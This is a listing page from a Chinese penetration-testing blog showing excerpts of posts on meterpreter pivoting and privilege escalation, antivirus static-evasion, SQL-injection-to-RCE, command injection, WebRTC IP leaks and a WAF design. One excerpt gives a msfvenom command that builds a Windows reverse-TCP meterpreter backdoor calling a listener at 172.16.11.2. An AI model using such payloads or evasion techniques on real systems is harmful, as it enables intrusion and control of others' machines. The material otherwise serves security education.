上一页 1 ··· 31 32 33 34 35 36 37 38 39 ··· 44 下一页
摘要: 0x00 SettingContent-ms文件介绍 .SettingContent-ms是在Windows 10中引入的一种文件类型,它的内容是XML格式进行编写的,主要用于创建Windows设置页面的快捷方式.Windows 10下行.SettingContent-ms后缀的文件,系统并未判断该 阅读全文
posted @ 2018-09-13 18:24 渗透测试中心 阅读(2161) 评论(0) 推荐(0) 编辑
摘要: 0x00 前言 问题发生在user.php的的显示函数,模版变量可控,导致注入,配合注入可达到远程代码执行 0x00 前言 问题发生在user.php的的显示函数,模版变量可控,导致注入,配合注入可达到远程代码执行 0x01 漏洞分析 1.SQL注入 先看user.php的$ back_act变量来 阅读全文
posted @ 2018-09-13 18:13 渗透测试中心 阅读(1433) 评论(0) 推荐(0) 编辑
摘要: 0x00 BGP(RFC 1771、 RFC 4271)定义 全称是Border Gateway Protocol, 对应中文是边界网关协议,最新版本是BGPv4。 BGP是互联网上一个核心的互联网去中心化自治路由协议。它的地位是核心的毫不夸张地说, 是目前唯一连接海陆空和7大洲4大洋的外部路由协议 阅读全文
posted @ 2018-08-28 09:50 渗透测试中心 阅读(9792) 评论(1) 推荐(2) 编辑
摘要: 0x00 VPN泄漏本地IP 最近爆出VPN可以被准确地测出浏览者的真实IP地址,这被称为WebRTC特征。只要到这个网页就可以测试你的VPN是否泄露的真实IP。 https://diafygi.github.io/webrtc-ips/ 来示范通过 JS 获取代理用户的真实 IP 地址, 为了大家 阅读全文
posted @ 2018-08-23 10:41 渗透测试中心 阅读(12) 评论(0) 推荐(0) 编辑
摘要: 0x01 meterpreter多级内网代理穿透 1.Pivoting 基本上可以概括为,在正常情况下仅仅只是通过利用被控制的计算机我们可能依旧无法进行网络访问。假设一台被控制的计算机连接有多个网络,将其作为我们的跳板,那么网络隔离的手段对我们来说就形同虚设。跟着这个思路,攻击者在被控制的跳板主机上 阅读全文
posted @ 2018-08-16 03:07 渗透测试中心 阅读(885) 评论(0) 推荐(0) 编辑
摘要: 0×01 静态检测与对抗 1.静态分析原理 简单的来说,就是通过特征码识别静态文件,杀软会扫描存在磁盘上的镜像文件,如果满足特征码,就识别为恶意软件。 恶意软件匹配规则yara匹配恶意软件的时候就是用的这样的方式。 通过特征来识别抓HASH工具QuarksPwDump,yara规则如下(查看源码) 阅读全文
posted @ 2018-08-16 03:05 渗透测试中心 阅读(1747) 评论(0) 推荐(0) 编辑
摘要: 0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe 阅读全文
posted @ 2018-08-16 03:03 渗透测试中心 阅读(32064) 评论(1) 推荐(2) 编辑
摘要: 0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链 阅读全文
posted @ 2018-08-16 02:56 渗透测试中心 阅读(138631) 评论(7) 推荐(10) 编辑
摘要: ###命令执行定义 直接调用操作系统命令: 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 命令执行是指攻击者通过浏览 阅读全文
posted @ 2018-08-15 03:21 渗透测试中心 阅读(2345) 评论(0) 推荐(0) 编辑
摘要: 0x01 前言 ngx_lua_waf实现 WAF一句话描述,就是解析HTTP请求(协议解析模块),规则检测(规则模块),做不同的防御动作(动作模块),并将防御过程(日志模块)记录下来。所以本文中的WAF的实现由五个模块(配置模块、协议解析模块、规则模块、动作模块、错误处理模块)组成。 原版本主要的 阅读全文
posted @ 2018-08-07 20:28 渗透测试中心 阅读(1562) 评论(0) 推荐(0) 编辑
上一页 1 ··· 31 32 33 34 35 36 37 38 39 ··· 44 下一页